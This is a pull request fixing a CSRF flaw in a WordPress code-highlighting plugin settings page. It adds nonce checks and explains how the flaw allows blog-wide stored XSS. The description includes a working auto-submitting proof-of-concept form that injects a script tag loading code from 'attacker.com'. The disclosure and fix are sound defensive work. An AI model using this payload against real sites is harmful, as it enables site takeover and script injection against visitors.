### PR TITLE
Fix CSRF vulnerability that can lead to blog-wide XSS

### DIFF
--- a/wp_code_highlight.js.php
+++ b/wp_code_highlight.js.php
@@ -454,6 +454,7 @@ function hljs_settings_page() {
     global $PLUGIN_DIR;
     if (isset( $_POST['cmd'] ) && $_POST['cmd'] == 'hljs_save')
     {
+        check_admin_referer('hljs_save');
         $upload_options = array(
             'location' => $_POST['hljs_location'],
             'package' => $_POST['hljs_package'],
@@ -505,6 +506,7 @@ function hljs_settings_page() {
     <!-- html code of settings page -->
     <div class="wrap">
       <form id="hljs" method="post" action="<?php echo $_SERVER['REQUEST_URI'];?>">
+        <?php wp_nonce_field('hljs_save'); ?>
         <script type="text/javascript" src="<?php echo ($PLUGIN_DIR . '/highlight.common.pack.js'); ?>"></script>
         <script type="text/javascript">hljs.initHighlightingOnLoad();</script>
         <link rel="stylesheet" href="<?php echo ($PLUGIN_DIR . '/styles/default.css'); ?>" />


### PR DESCRIPTION
hljs is vulnerable to CSRF due to no anti-CSRF token on form submit, the "hljs_additional_css" parameter can be injected with arbitrary script, by escaping out of the </style> tag and then injecting <script>, this code will appear blog-wide once CSRF is executed.

Proof of concept:
```
<form id="hljs" name="hljs" method="post" action="https://example.com/wp-admin/options-general.php?page=wp-code-highlight-js">
	<input type="hidden" name="hljs_location" value="local">
	<input type="hidden" name="hljs_package" value="common">
	<input type="hidden" name="hljs_theme" value="default">
	<input type="hidden" name="hljs_additional_css" value="&lt;/style&gt;&lt;script src=&quot;https://attacker.com/poc.js&quot;&gt;&lt;/script&gt;">
	<input type="hidden" name="cmd" value="hljs_save">
	<input type="submit" value="Submit">
</form>
<script>
	document.getElementById('hljs').submit();
</script>
```